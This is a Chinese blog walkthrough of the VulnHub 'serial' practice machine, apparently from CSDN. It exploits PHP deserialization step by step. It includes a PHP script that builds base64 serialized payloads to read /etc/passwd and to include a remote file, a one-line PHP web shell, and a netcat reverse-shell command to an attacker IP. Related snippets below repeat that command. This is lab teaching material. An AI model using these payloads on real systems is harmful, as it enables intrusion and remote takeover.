反序列化靶机--serial

最新推荐文章于 2024-09-06 13:45:00 发布
最新推荐文章于 2024-09-06 13:45:00 发布
阅读量466 收藏 4
点赞数 16
文章标签: web安全 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_53736204/article/details/140866876
版权

反序列化靶机–serial

一、搭建环境

可以去vulhub上下载此靶机:
https://www.vulnhub.com/entry/serial-1,349/
下载好,之后,使用Vmware新建虚拟机打开,步骤如下:

1.首先创建新的虚拟机。

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

保持现有格式

打开虚拟机,环境配置完成

在这里插入图片描述

二、信息收集

1.使用nmap探测主机存活或者使用Kali里的netdicover进行探测。

-PS/-PA/-PU/-PY:这些参数即可以探测主机存活,也可以同时进行端口扫描。(例如:-PS,发送TCP SYN包进行主机探测)

nmap -PS -T4 192.168.30.0/24

在这里插入图片描述

访问web服务

在这里插入图片描述

F12在网络查看cookie,是一串base64编码。

Tzo0OiJVc2VyIjoyOntzOjEwOiIAVXNlcgBuYW1lIjtzOjM6InNrNCI7czo5OiIAVXNlcgB3ZWwiO086NzoiV2VsY29tZSI6MDp7fX0=

在这里插入图片描述

O:4:"User":2:{s:10:"Username";s:3:"sk4";s:9:"Userwel";O:7:"Welcome":0:{}}

在这里插入图片描述

用dirsearch扫目录

python3 dirsearch.py -u http://192.168.30.130/

在这里插入图片描述

访问目录得出bak.zip

在这里插入图片描述

下载压缩后查看代码进行代码审计

在这里插入图片描述

经过代码审计可构造payload,尝试读取passwd文件,payload如下

<?php
  class Log {
    private $type_log='/etc/passwd';

  }
  class User {
    private $name = "admin";
    private $wel;

    function __construct() {
      $this->wel = new Log();
  }
}

$obj = new User();
echo base64_encode(serialize($obj));
?>

在web下运行代码得出64比编码后的序列化

在这里插入图片描述

Tzo0OiJVc2VyIjoyOntzOjEwOiIAVXNlcgBuYW1lIjtzOjU6ImFkbWluIjtzOjk6IgBVc2VyAHdlbCI7TzozOiJMb2ciOjE6e3M6MTM6IgBMb2cAdHlwZV9sb2ciO3M6MTE6Ii9ldGMvcGFzc3dkIjt9fQ==

抓包在user参数上写序列化的64编码的值

在这里插入图片描述

三、获取shell

在本地打开web服务,上传一个txt文件,内容是:<?php system($_GET['cmd']);?>

c.txt文件内容:

<?php @system($_GET['cmd']);?>

外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传

构造payload,尝试读取web下的c.txt,payload如下

在这里插入图片描述

<?php
class Log
{
    private $type_log = "http://172.16.3.161/c.txt";

}
class User
{
    private $name = "admin";
    private $wel;

    function __construct()
    {
        $this->wel = new Log();
    }
}

$obj = new User();
echo base64_encode(serialize($obj));
?>

在cmd传参,通过命令获取用户

在这里插入图片描述

四、反弹shell

?cmd=rm+/tmp/f%3bmkfifo+/tmp/f%3bcat+/tmp/f|/bin/sh+-i+2>%261|nc+172.16.3.161+4444+>/tmp/f

在这里插入图片描述

反弹成功

外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传

黑白时光les
关注
  • 16
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
靶机-DC1通关详细过程
06-27
靶机-DC1通关详细过程
靶机-dvwa修改配置版
05-09
靶机-dvwa修改配置版是一个用于网络安全教育和练习的平台,主要针对Web应用程序的安全漏洞。DVWA(Damn Vulnerable Web Application)是一个开源的Web应用,设计用来帮助安全专业人员测试他们的技能,以及让开发者更...
反序列化靶机-serial攻略
qq_68186313的博客
08-01 514
8、查看代码,发现index.php文件包含了user.class.php文件,对cookie中的user参数进行了序列化和base64编码,然后user.class.php文件包含了log.class.php,且定义了两个类,分别是Welcome和User,并调用了log.class.php文件中的handler函数。log.class.php文件又定义了Log类和成员变量type_log,且handler函数对变量还进行了文件包含和输出。7、下载bak.zip,解压发现3个php文件。
php反序列化靶机serial实战
zzgslh的博客
04-07 1244
靶机描述 今天研究一下php反序列化靶机serial实战。目标为获取root权限。 靶机信息 可以去vulhub上下载靶机: https://www.vulnhub.com/entry/serial-1,349/ 下载好,之后,使用Vmware新建虚拟机打开,步骤如下: 1.首先创建新的虚拟机。 2.然后选择客户机版本为Ubuntu 64位。 3.然后选择使用现有磁盘,选择下载的...
vulhub-serial-php反序列化靶机实战
飞鱼的企鹅的博客
01-04 1937
前言 此漏洞环境是vulhub上的系列漏洞之一,是php反序列化漏洞,也用到了远程代码执行漏洞。 复现过程 环境搭建 靶机下载地址 https://www.vulnhub.com/entry/serial-1,349/ 下载好之后直接用Vmware workstation打开就行了 存活扫描 内网存活主机扫描 arp-scan -l 扫描到的存活主机是192.168.77.157 端口扫描 ...
反序列化--serial
weixin_57524749的博客
08-01 210
讲以下参数修改为kali ip 和指定端口去kali监听。访问构造好的php文件获取到base64编码后的字节序列。按F12 ---》网络---》cookie得到一串编码。修改palyload改为本机ip加上我们创建的文件。dirb http://靶机ip 扫描目录。用kali扫描ip arp-scan -l。抓包,将编码后的数据抓包后替换红色部分。访问重新修改的gouzao.php文件。访问扫描到的靶机ip访问。写一个cmd.txt文件。解压得到三个php文件。成功执行反弹shell。
vulhub-serial-php反序列化靶机
2201_75569982的博客
08-06 705
然后构造payload,尝试读取passwd文件,payload如下 新创建一个123.php在本地的www下 然后 把type_log参数后面记得改成自己上传到本地的一句话木马。然后去抓包 把访问123.php得到的base64编码 替换cookie 然后打一个whoami成功执行。然后去访问自己新创建的php 我这里用的是123.php 打开就看到他的base64编码。使用御剑扫描发现存在**…/backup/**路径,访问发现存在目录遍历漏洞。查看文件,多返回几次上级目录,找到一个txt文件。
反序列化靶机serial
weixin_53198216的博客
08-01 314
5.进行base64解码,乱码为空格改为\x00,再次进行base64加密,得到payload如下。4.F12查看网络,刷新一下得到一串base64编码。6.打开抓包替换为修改后的payload。2.打开kali扫描IP。后面的明天做先吃饭去了。1.安装靶场进行配置。
serial 反序列化靶机
l_OMl_l的博客
08-01 652
5.在 kali 开启监听, 抓包,发送重放器,修改 cookie ,并在 GET 处添加参数以及 shell 反弹语句rm+/tmp/f%3bmkfifo+/tmp/f%3bcat+/tmp/f|/bin/sh+-i+2>%261|nc+kali ip+7777+>/tmp/f。4.构造下方代码 1.php ,保存到自己的网站下运行,实现将 welcome 替换为 Log ,同时使用文件包含漏洞上传木马文件,最后将代码序列化并 base64 编码。2.扫描靶机ip,端口,访问。
反序列化靶机serial复现
muyuchen110的博客
08-01 737
【代码】反序列化靶机serial复现。
php 靶机,php反序列化靶机serial实战
weixin_39552037的博客
03-10 382
靶机描述今天研究一下php反序列化靶机serial实战。目标为获取root权限。靶机信息可以去vulhub上下载靶机:https://www.vulnhub.com/entry/serial-1,349/下载好,之后,使用Vmware新建虚拟机打开,步骤如下:1.首先创建新的虚拟机。 2.然后选择客户机版本为Ubuntu 64位。 3.然后选择使用现有磁盘,选择下载的vmdk磁盘文件即可。 ...
网络攻防靶机-设计概要 V5.docx
09-06
网络攻防靶机-设计概要 V5.docx 网络攻防靶机是指一种可以模拟网络攻击和防御的系统,旨在提高网络安全防御能力。该系统的设计概要包括项目概况、术语与定义、项目来源与参考资料、引用标准和规范、系统总体框架、...
Vulnhub靶机系列:De-ICE: S1.120
01-09
文章目录靶机地址靶机设置利用知识及工具信息收集并getshell提权总结 靶机地址 https://www.vulnhub.com/entry/de-ice-s1120,10/ 靶机设置 靶机默认ip是192.168.1.120,最好设一个对应网段的网卡给它,我的这篇文章有...
靶机-佛山发发鱼喊access注入
05-09
靶机-佛山发发鱼喊access注入!很多视频教程中使用的靶机!默认含参数过滤,为了方便新人测试我已经去掉了参数过滤!
如何用3个月零基础入门网络安全?_网络安全零基础怎么学习
最新发布
2401_84466224的博客
09-06 1583
我们知道计算机最早是在西方发明出来的,很多名词或者代码都是英文的,甚至现有的一些教程最初也是英文原版翻译过来的,而且一个漏洞被发现到翻译成中文一般需要一个星期的时间,在这个时间差上漏洞可能都修补了。”答案是否定的,黑客用的电脑,不需要什么高的配置,只要稳定就行.因为黑客所使用的一些程序,低端CPU也可以很好的运行,而且不占什么内存.还有一个,黑客是在DOS命令下对进行的,所以电脑能使用到最佳状态!观看学习近十年所有0day挖掘的帖,然后搭建环境,去复现漏洞,去思考学习笔者的挖洞思维,培养自己的渗透思维。
什么是网络安全
网络研究观
09-04 2602
了解不同类型的网络安全和主要形式的网络威胁。
网络安全】漏洞挖掘
anquan2233的博客
08-29 1697
在springframeworl/expression/spel/stand/InternalSpelExpressionParser/doParseExpression()方法中、会在tokenizer.process()中 对token进行 源码与字节码的判断操作、继续向下。会进入到springframework/cloud/function/context/config/RoutingFunction/functionFromExpression()方法。Payload 的构造可以参考官方测试用例。
vulnhub靶机-jangow: 1.0.1
03-16
vulnhub靶机-jangow: 1..1是一款用于渗透测试和漏洞攻击的虚拟机。它基于Ubuntu操作系统,包含多个漏洞和弱点,供安全专业人员进行测试和实践。该靶机的目标是获取root权限,并且需要使用各种技术和工具来完成任务。...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值